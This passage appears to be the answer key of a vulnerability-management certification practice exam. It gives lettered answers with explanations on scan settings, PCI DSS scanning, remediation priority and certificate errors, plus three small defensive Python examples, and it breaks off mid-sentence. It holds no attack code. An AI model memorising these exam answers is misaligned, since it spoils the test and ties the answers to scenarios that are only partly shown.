A. While ARP tables may provide the necessary information, this is a difficult way to enumerate hosts and is prone to error. Doug would have much greater success if he consulted the organization’s asset management tool, ran a discovery scan, or looked at the results of other recent scans.


A. The most likely reason for this result is that the scan sensitivity is set to exclude low- 
impact vulnerabilities rated as 1 or 2. There is no reason to believe that Mary configured 
the scan improperly because this is a common practice to limit information overload and 
is likely intentional. It is extremely unlikely that systems in the data center contain no 
low-impact vulnerabilities when they have high-impact vulnerabilities. If Mary excluded 
high-impact vulnerabilities, the report would not contain any vulnerabilities rated 4 or 5. 


D. This vulnerability is presented as an Info level vulnerability and, therefore, does not 
represent an actual threat to the system. James can safely ignore this issue. 


D. Vulnerability scans can only provide a snapshot in time of a system’s security status 
from the perspective of the vulnerability scanner. Agent-based monitoring provides a 
detailed view of the system’s configuration from an internal perspective and is likely to 
provide more accurate results, regardless of the frequency of vulnerability scanning. 


A. The SQL injection vulnerability is clearly the highest priority for remediation. It has 
the highest severity (5/5) and also exists on a server that has public exposure because it 
resides on the DMZ network. 


D. Pete and the desktop support team should apply the patch using a GPO or other centralized configuration management tool. This is much more efficient than visiting each workstation individually, either in person or via remote connection. There is no indication in the scenario that a registry update would remediate this issue.


A. An insider would have the network access required to connect to a system on the inter- 
nal server network and exploit this buffer overflow vulnerability. Buffer overflow vulner- 
abilities typically allow the execution of arbitrary code, which may allow an attacker to 
gain control of the server and access information above his or her authorization level. Vul- 
nerability 3 may also allow the theft of information, but it has a lower severity level than 
vulnerability 2. Vulnerabilities 4 and 5 are denial-of-service vulnerabilities that would 
allow the disruption of service, not the theft of information. 


A. Wanda should restrict interactive logins to the server. The vulnerability report states 
that “The most severe of these vulnerabilities could allow remote code execution if a user 
either visits a specially crafted website or opens a specially crafted document.” If Wanda 
restricts interactive login, it greatly reduces the likelihood of this type of activity. Removing 
Internet Explorer or Microsoft Office might lower some of the risk, but it would 
not be as effective as completely restricting logins. Applying the security patch is not an 
option because of the operational concerns cited in the question. 


D. For best results, Garret should combine both internal and external vulnerability scans. 
The external scan provides an “attacker’s eye view” of the web server, while the internal 
scan may uncover vulnerabilities that would only be exploitable by an insider or an 
attacker who has gained access to another system on the network. 


A. The scenario describes an acceptable use of a compensating control that has been 
reviewed with the merchant bank. Frank should document this as an exception and move 
on with his scans. Other actions would go against his manager’s wishes and are not 
required by the situation. 


D. All three of these scan types provide James with important information and/or are 
needed to meet regulatory requirements. The external scan from James’ own network 
provides information on services accessible outside of the payment card network. The internal 
scan may detect vulnerabilities accessible to an insider or someone who has breached the 
network perimeter. The approved scanning vendor (ASV) scans are required to meet PCI 
DSS obligations. ASV scans are typically run infrequently and do not provide the same 
level of detailed reporting as external scans run with the organization’s own scanner, so James 
should include both in his program. 


A. Any one of the answer choices provided is a possible reason that Helen received this 
result. However, the most probable scenario is that the printer is actually running a web 
server and this is a true positive result. Printers commonly provide administrative web 
interfaces, and those interfaces may be the source of vulnerabilities. 


D. Joe has time to conduct some communication and change management before making 
the change. Even though this change is urgent, Joe should take advantage of that time to 
communicate with stakeholders, conduct a risk assessment, and initiate change manage- 
ment processes. These tasks will likely be abbreviated forms of what Joe would do if he 
had time to plan a change normally, but he should make every effort to complete them. 


C. Port 389 is used by the Lightweight Directory Access Protocol (LDAP) and is not part 
of the SMB communication. SMB may be accessed directly over TCP port 445 or indirectly 
by using NetBIOS over TCP/IP, which uses UDP ports 137 and 138 and TCP port 139. 


B. Ted can reduce the number of results returned by the scan by decreasing the scan sen- 
sitivity. This will increase the threshold for reporting, only returning the most important 
results. Increasing the scan sensitivity would have the opposite effect, increasing the num- 
ber of reported vulnerabilities. Changing the scan frequency would not alter the number 
of vulnerabilities reported. 


A. Microsoft has discontinued support for Internet Explorer versions other than IE 
11 and is planning to discontinue Internet Explorer after version 11 because it is being 
replaced by Microsoft Edge. Google Chrome and Mozilla Firefox are also suitable 
replacement browsers. 


A. Buffer overflow vulnerabilities occur when an application attempts to put more data 
in a memory location than was allocated for that use, resulting in unauthorized writes to 
other areas of memory. Bounds checking verifies that user-supplied input does not exceed 
the maximum allowable length before storing it in memory. 


C. This vulnerability allows an attacker to crash a server after running two consecutive 
port scans. The simplest way to trigger this vulnerability is by using a port scanning 
tool, such as nmap. While Nessus or Metasploit may be able to trigger this vulnerability, 
it would be easier to do so with a command-line port scanner. Wireshark is a protocol 
analyzer and could not trigger this vulnerability. 


A. The Simple Network Management Protocol (SNMP) uses traps and polling requests 
to monitor and manage both physical and virtual networks. The Simple Mail Transfer 
Protocol (SMTP) is an email transfer protocol. The Border Gateway Protocol (BGP) and 
Enhanced Interior Gateway Routing Protocol (EIGRP) are used to make routing decisions. 


D. System D is the only system that contains a critical vulnerability, as seen in the scan 
results. Therefore, Sherry should begin with this system as it has the highest-priority 
vulnerability. 


D. The problem Victor is experiencing is that the full scan does not complete in the 
course of a single day and is being cancelled when the next full scan tries to run. He can 
fix this problem by reducing the scanning frequency. For example, he could set the scan 
to run once a week so that it completes. Reducing the number of systems scanned would 
not meet his requirement to scan the entire data center. He cannot increase the number of 
scanners or upgrade the hardware because he has no funds to invest in the system. 


C. The only high-criticality issue on this report (and all but one of the medium-criticality 
issues) relates to an outdated version of the Apache web server. Vanessa should upgrade 
this server before taking any other remediation action. 


D. The Relaunch On Finish schedule option will run continuous vulnerability scanning 
of the target servers. Each time the scan completes, it will start over again. Gil should be 
extremely careful when choosing this option because it may cause undesirable resource 
consumption for both the scanner and the target servers. 


D. This scan result does not directly indicate a vulnerability. However, it does indicate 
that the server is configured for compatibility with 16-bit applications, and those applica- 
tions may have vulnerabilities. It is an informational result that does not directly require 
action on Terry’s behalf. 


B. PuTTY is a commonly used remote login application used by administrators to con- 
nect to servers and other networked devices. If an attacker gains access to the SSH private 
keys used by PuTTY, the attacker could use those keys to gain access to the systems man- 
aged by that administrator. This vulnerability does not necessarily give the attacker any 
privileged access to the administrator’s workstation, and the SSH key is not normally used 
to encrypt stored information. 


B. Craig should remove the four pieces of obsolete software identified by the vulnerability 
scan (Java 6.1, Internet Explorer 8, Microsoft .NET Framework 4, and Microsoft Visual 
C++ 2005). He should also apply the Windows MS17-012 security update and patch 
Chrome, Java, and other vulnerable applications on this system. All of these issues raise 
critical vulnerabilities in the scan report. There is no indication that host firewall changes 
are required. 


D. While all of the technologies listed here contribute to the security of mobile devices, 
only containerization allows the isolation and protection of sensitive information separate 
from other uses of the device. Containerization technology creates a secure vault for cor- 
porate information that may be remotely wiped without affecting other uses of the device. 
It also protects the contents of the container from other applications and services running 
on the device. 


A. In this situation, Sally recognizes that there is no imminent threat, so it is not neces- 
sary to follow an emergency change process that would allow her to implement the change 
before conducting any change management. That said, the change should be made without 
waiting up to three months for a scheduled patch cycle. Therefore, Sally’s best option is to 
initiate a high-priority change through her organization’s change management process. 


C. Gene’s best option is to alter the sensitivity level of the scan so that it excludes low- 
importance vulnerabilities. The fact that his manager is telling him that many of the 
details are unimportant is his cue that the report contains superfluous information. While 
he could edit the chart manually, he should instead alter the scan settings so that he does 
not need to make those manual edits each time he runs the report. 


D. Veronica is required to rerun the vulnerability scan until she receives a clean result 
that may be submitted for PCI DSS compliance purposes. 


A. PCI DSS requires that networks be scanned quarterly or after any “significant change in 
the network.” A firewall upgrade definitely qualifies as a significant network change, and 
Chanda should schedule a vulnerability scan immediately to maintain PCI DSS compliance. 


A. Network segmentation is one of the strongest controls that may be used to protect 
industrial control systems and SCADA systems by isolating them from other systems on 
the network. Input validation and memory protection may provide some security, but the 
mitigating effect is not as strong as isolating these sensitive systems from other devices 
and preventing an attacker from connecting to them in the first place. Redundancy may 
increase uptime from accidental failures but would not protect the systems from attack. 


C. While any of these reasons are possible, the most likely cause of this result is that the 
system administrator blocked the scanner with a host firewall rule. It is unlikely that the 
administrator completed the lengthy, time-consuming work overnight and without caus- 
ing a service disruption. If the server were down, other IT staff would have reported the 
issue. If the scan did not run, Glenda would not see any entries in the scanner’s logs. 


B. Any addresses in the 10.0.0.0/8, 172.16.0.0/12 (172.16.x.x through 172.31.x.x), and 
192.168.0.0/16 ranges are RFC 1918 private IP addresses that are not routable over the 
Internet. Therefore, of the addresses listed, only 12.8.1.100 could originate outside the 
local network. 
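A short Python check for the private-range rule in this answer, added here as an illustration and not taken from the book or its exhibits. It uses the standard-library ipaddress module and a constructed list of four addresses (not the exhibit from the question). The point it makes explicit is that 172.16.0.0/12 runs through 172.31.255.255, so a test that only looks for "172.16." would wrongly flag 172.20.x.x or 172.31.x.x as external:

```python
import ipaddress

# The three RFC 1918 private ranges. 172.16.0.0/12 spans 172.16.0.0 through
# 172.31.255.255, not merely the 172.16.x.x addresses the shorthand suggests.
RFC1918_NETWORKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)


def is_rfc1918(address: str) -> bool:
    """Return True if the IPv4 address falls inside an RFC 1918 private range.

    Loopback, link-local and other special ranges are deliberately not treated
    as RFC 1918 here; the question is only about the three private blocks."""
    ip = ipaddress.ip_address(address)
    if ip.version != 4:
        return False
    return any(ip in net for net in RFC1918_NETWORKS)


def external_candidates(addresses):
    """Return the addresses that could have originated outside the local network."""
    return [a for a in addresses if not is_rfc1918(a)]


# Constructed sample in the style of the question; not the book's exhibit.
SAMPLE_ADDRESSES = ["10.8.1.100", "172.16.1.100", "192.168.1.100", "12.8.1.100"]

if __name__ == "__main__":
    for addr in SAMPLE_ADDRESSES:
        print(f"{addr:16} {'private (RFC 1918)' if is_rfc1918(addr) else 'publicly routable'}")
    print("possible external sources:", external_candidates(SAMPLE_ADDRESSES))
```

Run it with the sample and only 12.8.1.100 survives the filter; substitute 172.31.0.5 for one of the private entries and it is still (correctly) treated as internal.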


B. The most likely issue here is that there is a network firewall between the server and the 
third-party scanning service. This firewall is blocking inbound connections to the web 
server and preventing the external scan from succeeding. CIFS generally runs on port 445, 
not port 80 or 443. Those ports are commonly associated with web services. The scanner 
is not likely misconfigured because it is successfully detecting other ports on the server. 
Nick should either alter the firewall rules to allow the scan to succeed or, preferably, place 
a scanner on a network in closer proximity to the web server. 


A. Change management processes should always include an emergency change procedure. 
This procedure should allow applying emergency security patches without working 
through the standard change process. Thomas has already secured stakeholder approval 
on an informal basis so he should proceed with the patch and then file a change request 
after the work is complete. Taking the time to file the change request before completing 
the work would expose the organization to a critical security flaw during the time 
required to complete the paperwork. 


C. The label A designates the guest operating systems in this environment. Each virtualization 
platform may run multiple guest operating systems, all of which share the physical resources. 


A. The label B designates the hypervisor in this environment. In a bare-metal virtualiza- 
tion environment, the hypervisor sits beneath the guest operating systems and controls 
access to memory, disk, CPU, and other system resources. 


D. The label C designates the physical hardware in this environment. In a bare-metal vir- 
tualization environment, the physical hardware sits beneath the hypervisor, which moder- 
ates access by guest operating systems. There is no host operating system in a bare-metal 
virtualization approach. 


B. The vulnerability description indicates that this software has reached its end-of-life 
(EOL) and, therefore, is no longer supported by Microsoft. Mike’s best solution is to 
remove this version of the framework from the affected systems. No patches will be 
available for future vulnerabilities. There is no indication from this result that the systems 
require operating system upgrades. Mike should definitely take action because of the 
critical severity (5 on a five-point scale) of this vulnerability. 


B. Credentialed scans are able to log on to the target system and directly retrieve configu- 
ration information, providing the most accurate results of the scans listed. Unauthenti- 
cated scans must rely upon external indications of configuration settings, which are not as 
accurate. The network location of the scanner (external vs. internal) will not have a direct 
impact on the scanner’s ability to read configuration information. 


C. The best path for Brian to follow would be to leverage the organization’s existing 
trouble ticket system. Administrators likely already use this system on a regular basis, and 
it can handle reporting and escalation of issues. Brian might want to give administrators 
access to the scanner and/or have emailed reports sent automatically as well, but those 
will not provide the tracking that he desires. 


A. Vulnerability scanners should be updated as often as possible to allow the scanner to 
retrieve new vulnerability signatures as soon as they are released. Tonya should choose 
daily updates. 


C. Ben is facing a difficult challenge and should likely perform all of the actions described 
in this question. However, the best starting point would be to run Windows Update to 
install operating system patches. Many of the critical vulnerabilities relate to missing 
Windows patches. The other actions may also resolve critical issues, but they all involve 
software that a user must run on the server before they can be exploited. This makes them 
slightly lower priorities than the Windows flaws that may be remotely exploitable with no 
user action. 


A. Tom should consult service level agreements (SLAs) and memorandums of understanding 
(MOUs). These documents should contain all commitments made to customers related 
to performance. Disaster recovery plans (DRPs) and business impact assessments (BIAs) 
should not contain this type of information. 


C. Don should likely focus his efforts on high-priority vulnerabilities, as vulnerability 
scanners will report results for almost any system scanned. The time to resolve critical 
vulnerabilities, the number of open critical vulnerabilities over time, and the number 
of systems containing critical vulnerabilities are all useful metrics. The total number of 
reported vulnerabilities is less useful because it does not include any severity information. 


A. Although the vulnerability scan report does indicate that this is a low-severity vulnerability, 
Don must take this information in context. The management interface of a virtualization 
platform should never be exposed to external hosts, and it also should not use 
unencrypted credentials. In that context, this is a critical vulnerability that could allow 
an attacker to take control of a large portion of the computing environment. Don should 
work with security and network engineers to block this activity at the firewall as soon 
as possible. Shutting down the virtualization platform is not a good alternative because 
it would be extremely disruptive, and the firewall adjustment is equally effective from a 
security point of view. 


B. The server described in this report requires multiple Red Hat Linux and Firefox 
patches to correct serious security issues. One of those Red Hat updates also affects the 
MySQL database service. While there are Oracle patches listed on this report, they relate 
to Oracle Java, not an Oracle database. 


D. The Technical Report will contain detailed information on a specific host and is 
designed for an engineer seeking to remediate the system. The PCI Technical Report 
would focus on credit card compliance issues, and there is no indication that this server is 
used for credit card processing. The Qualys Top 20 Report and Executive Report would 
contain summary information more appropriate for a management audience and covering 
an entire network, rather than providing detailed information on a single system. 


D. The use of FTP is not considered a good security practice. Unless tunneled through a 
secure protocol, FTP is unencrypted, allowing an attacker to eavesdrop on communica- 
tions and steal credentials that may be transmitted over FTP links. Additionally, this vul- 
nerability indicates that an attacker can gain access to the server without even providing 
valid credentials. 


B. The scan report shows two issues related to server accounts: a weak password policy 
for the Administrator account and an active Guest account. Tom should remediate these 
issues to protect against the insider threat. The server also has an issue with weak encryp- 
tion, but this is a lower priority given that the machine is located on an internal network. 


B. While all of the solutions listed may remediate some of the vulnerabilities discovered 
by Dave’s scan, the vast majority of issues in an unmaintained network result from miss- 
ing security updates. Applying patches will likely resolve quite a few vulnerabilities, if not 
the majority of them. 


D. Matt should separate the two networks using a network segmentation technique, 
such as placing the new company on a separate VLAN or firewalling the two networks. 
A proxy server would not be effective because there is no indication that either network 
intends to offer services to the other. 


C. Rhonda should deploy the patch in a sandbox environment and then thoroughly test 
it prior to releasing it in production. This reduces the risk that the patch will not work 
well in her environment. Simply asking the vendor or waiting 60 days may identify some 
issues, but it does not sufficiently reduce the risk because the patch will not have been 
tested in her company’s environment. 


B. Service level agreements (SLAs) specify the technical parameters of a vendor relation- 
ship and should include coverage of service availability as well as remedies for failure to 
meet the agreed-upon targets. Memorandums of understanding (MOUs) are less formal 
documents that outline the relationship between two organizations. Business partnership 
agreements (BPAs) typically cover business, rather than technical, issues and would not 
normally include availability commitments. Business impact assessments (BIAs) are risk 
assessments and are not legal agreements. 


D. While all of these vulnerabilities do pose a confidentiality risk, the SQL injection vul- 
nerability poses the greatest threat because it may allow an attacker to retrieve the con- 
tents of a backend database. The HTTP TRACK/TRACE methods and PHP information 
disclosure vulnerabilities may provide reconnaissance information but would not directly 
disclose sensitive information. SSLv3 is no longer considered secure but is much more dif- 
ficult to exploit for information theft than a SQL injection issue. 


C. Bring your own device (BYOD) strategies allow users to operate personally owned 
devices on corporate networks. These devices are more likely to contain vulnerabilities 
than those managed under a mobile device management (MDM) system or a corporate- 
owned, personally enabled (COPE) strategy. Transport Layer Security (TLS) is a network 
encryption protocol, not a mobile device strategy. 


A. This is a critical vulnerability that should be addressed immediately. In this case, 
Kassie should decommission the server and replace it with a server running a current 
operating system. Microsoft no longer supports Windows Server 2003 and will not issue 
patches for vulnerabilities identified after July 2015. 


B. Morgan or the domain administrator could remove the software from the system, but 
this would not allow continued use of the browser. The network administrator could theo- 
retically block all external web browsing, but this is not a practical solution. The browser 
developer is the only one in a good situation to correct an overflow error because it is a 
flaw in the code of the web browser. 


A. Jeff should begin by looking at the highest-severity vulnerabilities and then identify 
whether they are confidentiality risks. The highest-severity vulnerability on this report is 
the Rational ClearCase Portscan Denial of Service vulnerability. However, a denial-of- 
service vulnerability affects availability, rather than confidentiality. The next highest- 
severity report is the Oracle Database TNS Listener Poison Attack vulnerability. A poi- 
soning vulnerability may cause hosts to connect to an illegitimate server and could result 
in the disclosure of sensitive information. Therefore, Jeff should address this issue first. 


B. While all of these concerns are valid, the most significant problem is that Eric does not 
have permission from the potential client to perform the scan and may wind up angering 
the client (at best) or violating the law (at worst). 


B. The firewall rules would provide Renee with information about whether the service is 
accessible from external networks. Server logs would contain information on actual access 
but would not definitively state whether the server is unreachable from external addresses. 
Intrusion detection systems may detect an attack in progress but are not capable of blocking 
traffic and would not be relevant to Renee’s analysis. Data loss prevention systems protect 
against confidentiality breaches and would not be helpful against an availability attack. 


D. Mary should consult the organization’s asset inventory. If properly constructed and 
maintained, this inventory should contain information about asset criticality. The CEO 
may know some of this information, but it is unlikely that he or she would have all of the 
necessary information or the time to review it. System names and IP addresses may con- 
tain some hints to asset criticality but would not be as good a source as an asset inventory 
that clearly identifies criticality. 


A. The vulnerability description indicates that this is a vulnerability that exists in versions 
of Nessus earlier than 6.6. Upgrading to a more recent version of Nessus would correct 
the issue. 


C. Passive network monitoring meets Sarah’s requirements to minimize network band- 
width consumption while not requiring the installation of an agent. Sarah cannot use 
agent-based scanning because it requires application installation. She should not use 
server-based scanning because it consumes bandwidth. Port scanning does not provide 
vulnerability reports. 


D. Of the answers presented, the maximum number of simultaneous hosts per scan is 
most likely to have an impact on the total bandwidth consumed by the scan. Enabling safe 
checks and stopping the scanning of unresponsive hosts is likely to resolve issues where 
a single host is negatively affected by the scan. Randomizing IP addresses would only 
change the order of scanning systems. 


C. The issue raised by this vulnerability is the possibility of eavesdropping on adminis- 
trative connections to the database server. Requiring the use of a VPN would add strong 
encryption to this connection and negate the effect of the vulnerability. A patch is not an 
option because this is a zero-day vulnerability, meaning that a patch is not yet available. 
Disabling administrative access to the database server would be unnecessarily disrup- 
tive to the business. The web server’s encryption level is irrelevant to the issue as it would 
affect connections to the web server, not the database server. 


A. In a remote code execution attack, the attacker manages to upload arbitrary code to a 
server and run it. These attacks often result from the failure of an application or operating 
system component to perform input validation. 


C. Of the documents listed, only corporate policy is binding upon Raul, and he should 
ensure that his new system’s configuration complies with those requirements. The other 
sources may provide valuable information to inform Raul’s work, but compliance with 
them is not mandatory. 


A. The server with IP address 10.0.102.58 is the only server on the list that contains 
a level 5 vulnerability. Level 5 vulnerabilities have the highest severity and should be 
prioritized. The server at 10.0.16.58 has the most overall vulnerabilities but does not have 
any level 5 vulnerabilities. The servers at 10.0.46.116 and 10.0.69.232 have only level 3 
vulnerabilities, which are less severe than level 5 vulnerabilities. 
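The prioritization logic behind this answer, and behind the earlier answers on scan sensitivity (excluding level 1 and 2 findings to cut report noise) and on weighting DMZ exposure, is simple enough to write down. The following Python is an added example, not code from the book or from any scanner; the Finding records and the counts per host are constructed to mirror the shape of the question, not copied from its exhibit. It applies a sensitivity threshold first, then ranks hosts by their single worst finding rather than by how many findings they have, which is why one level 5 on 10.0.102.58 outranks the long list on 10.0.16.58:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    """One line of a scan report, reduced to what triage needs."""
    host: str
    title: str
    severity: int   # 1 (low) to 5 (critical), the five-point scale used in these questions
    exposed: bool   # True when the host sits on a public-facing segment such as a DMZ


def apply_sensitivity(findings, minimum_severity):
    """Keep only findings at or above the threshold.

    This is what a scanner's sensitivity setting does: raising the threshold
    shortens the report, lowering it brings the low-impact results back."""
    return [f for f in findings if f.severity >= minimum_severity]


def host_summary(findings):
    """Return {host: (highest severity seen, any exposed finding, number of findings)}."""
    summary = {}
    for f in findings:
        top, exposed, count = summary.get(f.host, (0, False, 0))
        summary[f.host] = (max(top, f.severity), exposed or f.exposed, count + 1)
    return summary


def rank_hosts(findings):
    """Order hosts for remediation.

    The single highest severity wins first (one level 5 outranks a dozen level 3s),
    public exposure breaks ties, then the raw count; the host name comes last so
    the order is deterministic."""
    summary = host_summary(findings)
    return sorted(
        summary,
        key=lambda h: (-summary[h][0], -int(summary[h][1]), -summary[h][2], h),
    )


# Constructed sample report (titles and counts are illustrative, not the book's exhibit).
SAMPLE_FINDINGS = [
    Finding("10.0.16.58", "OpenSSH version disclosure", 3, False),
    Finding("10.0.16.58", "TLS 1.0 enabled", 3, False),
    Finding("10.0.16.58", "SSLv3 supported", 3, False),
    Finding("10.0.16.58", "HTTP TRACE method enabled", 3, False),
    Finding("10.0.16.58", "phpinfo() page present", 3, False),
    Finding("10.0.16.58", "ICMP timestamp response", 2, False),
    Finding("10.0.102.58", "Outdated Apache HTTP Server", 5, False),
    Finding("10.0.102.58", "TLS 1.0 enabled", 3, False),
    Finding("10.0.46.116", "TLS 1.0 enabled", 3, False),
    Finding("10.0.46.116", "SSLv3 supported", 3, False),
    Finding("10.0.69.232", "TLS 1.0 enabled", 3, False),
    Finding("10.0.69.232", "Directory listing enabled", 1, False),
    Finding("dmz-web-01", "SQL injection in login form", 4, True),
]

if __name__ == "__main__":
    trimmed = apply_sensitivity(SAMPLE_FINDINGS, 3)   # hide level 1 and 2 noise
    print(f"{len(SAMPLE_FINDINGS)} findings, {len(trimmed)} at severity 3 or higher")
    for host in rank_hosts(trimmed):
        top, exposed, count = host_summary(trimmed)[host]
        print(f"{host:14} worst={top} exposed={exposed!s:5} findings={count}")
```

The ordering the example produces is the one the answer argues for: 10.0.102.58 first on its level 5, the DMZ host next because exposure breaks the tie among lower severities, and 10.0.16.58 only third despite having the most findings.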


A. Enabling credentialed scanning would increase the likelihood of detecting vulnerabili- 
ties that require local access to a server. Credentialed scans can read deep configuration 
settings that might not be available with an uncredentialed scan of a properly secured 
system. Updating the vulnerability feed manually may add a signature for this particular 
vulnerability but would not help with future vulnerabilities. Instead, Beth should config- 
ure automatic feed updates. Increasing the scanning frequency may increase the speed of 
detection but would not impact the scanner’s ability to detect the vulnerability. The orga- 
nization’s risk appetite affects what vulnerabilities they choose to accept but would not 
change the ability of the scanner to detect a vulnerability. 


A. Applying patches to the server will not correct SQL injection or cross-site scripting 
flaws, as these reside within the web applications themselves. Shannon could correct the 
root cause by recoding the web applications to use input validation, but this is the more 
difficult path. A web application firewall would provide immediate protection with lower 
effort. 


A. There is no reasonable justification for Ron reviewing the reports prior to providing 
them to the administrators responsible for the systems. In the interests of transparency 
and efficiency, he should configure the scans to run automatically and send automated 
notifications to administrators as soon as they are generated. This allows immediate reme- 
diation. There is nothing preventing Ron from performing a review of the scan results, but 
he should not filter them before providing them to the responsible engineers. 


C. This error indicates that the vulnerability scanner was unable to verify the signature 
on the digital certificate used by the web server. If the organization is using a self-signed 
digital certificate for this internal application, this would be an expected result. 


C. Cross-site scripting and cross-site request forgery vulnerabilities are normally easy to 
detect with vulnerability scans because the scanner can obtain visual confirmation of a 
successful attack. Unpatched web servers are often identified by using publicly accessible 
banner information. While scanners can often detect many types of SQL injection vulner- 
abilities, it is often difficult to confirm blind SQL injection vulnerabilities because they do 
not return results to the attacker but rely upon the silent (blind) execution of code. 


B. Analyzing and reporting findings to management is one of the core tasks of a con- 
tinuous monitoring program. Another core task is responding to findings by mitigating, 
accepting, transferring, or avoiding risks. Continuous monitoring programs are not tasked 
with performing forensic investigations, as this is an incident response process. 


A. The phpinfo file is a testing file often used by web developers during the initial con- 
figuration of a server. While any of the solutions provided here may remediate this vulner- 
ability, the most common course of action is to simply remove this file before the server is 
moved into production or made publicly accessible. 


D. The Unknown Device Report will focus on systems detected during the scan that are 
not registered with the organization’s asset management system. The High Severity Report 
will provide a summary of critical security issues across all systems. The Technical 
Report will likely contain too much detail and may not call out unknown systems. The 
Patch Report will indicate systems and applications that are missing patches but not 
necessarily identify unknown devices. 


B. Continuous monitoring uses agents installed on monitored systems to immediately 
report configuration changes to the vulnerability scanner. Scheduled scans would not 
detect a change until the next time they run. Automated remediation would correct secu- 
rity issues rather than report configuration changes. Automatic updates would ensure that 
scans use the most current vulnerability information. 


D. The manager has thought about the risk and, in consultation with others, determined 
that it is acceptable. Therefore, Mark should not press the matter and demand remedia- 
tion, either now or in six months. He should mark this vulnerability as an approved 
exception in the scanner to avoid future alerts. It would not be appropriate to mark this as 
a false positive because the vulnerability detection was accurate. 


C. Jacquelyn should update the vulnerability feed to obtain the most recent signatures 
from the vendor. She does not need to add the web servers to the scan because they are 
already appearing in the scan report. Rebooting the scanner would not necessarily update 
the feed. If she waits until tomorrow, the scanner may be configured to automatically 
update the feed, but this is not guaranteed and is not as efficient as simply updating the 
feed now. 


A. Extensible Configuration Checklist Description Format (XCCDF) is a language for 
specifying checklists and reporting checklist results. Common Configuration Enumera- 
tion (CCE) provides a standard nomenclature for discussing system configuration issues. 
Common Platform Enumeration (CPE) provides a standard nomenclature for describing 
product names and versions. Common Vulnerabilities and Exposures (CVE) provides a 
standard nomenclature for describing security-related software flaws. 
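Of the four SCAP naming schemes in this answer, CPE is the one an analyst most often has to handle by hand, because scanners and advisories both identify affected products as CPE 2.3 strings and matching a detected product against an advisory means comparing them component by component. The Python below is an added example, not from the book or any SCAP tool: a parser for the CPE 2.3 formatted-string form (`cpe:2.3:` followed by eleven colon-separated components, with a backslash escaping a literal colon) and a deliberately simplified matcher in which `*` in the advisory pattern means "any value". Full CPE matching also handles the `-` (not applicable) value and wildcards inside a component; those are left out here on purpose:

```python
# Component names of a CPE 2.3 formatted string, in order, after "cpe:2.3:".
CPE23_FIELDS = ["part", "vendor", "product", "version", "update", "edition",
                "language", "sw_edition", "target_sw", "target_hw", "other"]


def parse_cpe23(cpe: str) -> dict:
    """Parse a CPE 2.3 formatted string into a dict keyed by component name.

    Splits only on unescaped colons: a backslash escapes the following
    character, so a vendor written as 'acme\\:corp' is returned as 'acme:corp'.
    Raises ValueError for anything that is not a 13-field cpe:2.3 string
    (for example the older 'cpe:/a:...' URI form)."""
    fields, current, i = [], [], 0
    while i < len(cpe):
        ch = cpe[i]
        if ch == "\\" and i + 1 < len(cpe):
            current.append(cpe[i + 1])   # keep the escaped character literally
            i += 2
            continue
        if ch == ":":
            fields.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    fields.append("".join(current))
    if len(fields) != 13 or fields[0] != "cpe" or fields[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    return dict(zip(CPE23_FIELDS, fields[2:]))


def cpe_matches(candidate: str, pattern: str) -> bool:
    """True if the detected product (candidate) falls under the advisory's pattern.

    Simplified rule: each pattern component must be '*' (any) or equal the
    candidate's component. Good enough to answer 'is this Apache 2.4.29
    install covered by an advisory for any apache:http_server version?'"""
    c, p = parse_cpe23(candidate), parse_cpe23(pattern)
    return all(p[k] in ("*", c[k]) for k in CPE23_FIELDS)


# Constructed sample: a product as a scanner might report it, and two advisory patterns.
DETECTED = "cpe:2.3:a:apache:http_server:2.4.29:*:*:*:*:*:*:*"
ADVISORY_APACHE = "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"
ADVISORY_IIS = "cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:*"

if __name__ == "__main__":
    parsed = parse_cpe23(DETECTED)
    print(parsed["vendor"], parsed["product"], parsed["version"])
    print("covered by Apache advisory:", cpe_matches(DETECTED, ADVISORY_APACHE))
    print("covered by IIS advisory:   ", cpe_matches(DETECTED, ADVISORY_IIS))
```

The escape handling matters in practice: vendor and product names containing colons are rare but legal, and a naive `split(":")` silently shifts every later component by one.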


A. FISMA does specify many requirements for agencies that conduct vulnerability scans, 
but it does not contain any specific requirements regarding the frequency of the scans. It 
merely states that agencies must conduct scans of information systems and hosted applica- 
tions when new vulnerabilities potentially affecting the system/application are identified 
and reported. 


C. It would be difficult for Sharon to use agent-based or credentialed scanning in an 
unmanaged environment because she would have to obtain account credentials for each 
scanned system. Of the remaining two technologies, server-based scanning is more 
effective at detecting configuration issues than passive network monitoring. 


D. To be used in a secure manner, certificates must take advantage of a hash function that 
is not prone to collisions. The MD2, MD4, MD5, and SHA-1 algorithms all have 
demonstrated weaknesses and would trigger a vulnerability. The SHA-256 algorithm is still 
considered secure. 
B. This vulnerability should not prevent users from accessing the site, but it will cause 
their browsers to display a warning that the site is not secure. 


B. This error is a vulnerability in the certificate itself and may be corrected only by 
requesting a new certificate from the certificate authority (CA) that uses a secure hash 
algorithm in the certificate signature. 


A. Secure shell (SSH) traffic flows over TCP port 22. Port 636 is used by the Lightweight 
Directory Access Protocol (LDAP). Port 1433 is used by Microsoft SQL Server. Port 1521 
is used by Oracle databases. 


C. This error occurs when the server name on a certificate does not match the name of 
the server in question. It is possible that this certificate was created for another device or 
that the device name is slightly different than that on the certificate. Terry should resolve 
this error by replacing the certificate with one containing the correct server name. 


B. Lori should absolutely not try to run scans without the knowledge of other IT staff. 
She should inform her team of her plans and obtain permission for any scans that she 
runs. She should limit scans of production systems to safe plug-ins while she is learning. 
She should also limit the bandwidth consumed by her scans and the time of her scans to 
avoid impacts on production environments. 


D. Credentialed scans are also known as authenticated scans and rely upon having 
credentials to log onto target hosts and read their configuration settings. Meredith should 
choose this option. 


A. Norman’s manager is deciding to use the organization’s risk appetite (or risk tolerance) 
to make this decision. He is stating that the organization will tolerate medium severity 
risks but will not accept critical or high-severity risks. This is not a case of a false positive 
or false negative error, as they are not discussing a specific vulnerability. The decision is 
not based upon data classification because the criticality or sensitivity of information was 
not discussed. 


D. Birthday attacks occur when an attacker is able to discover multiple inputs that gener- 
ate the same output. This is an event known as a collision. 


A. The security and web development communities both consider Adobe Flash an out- 
dated and insecure technology. The best solution would be for Meredith to remove this 
software from systems in her organization. Applying the security patches would be a 
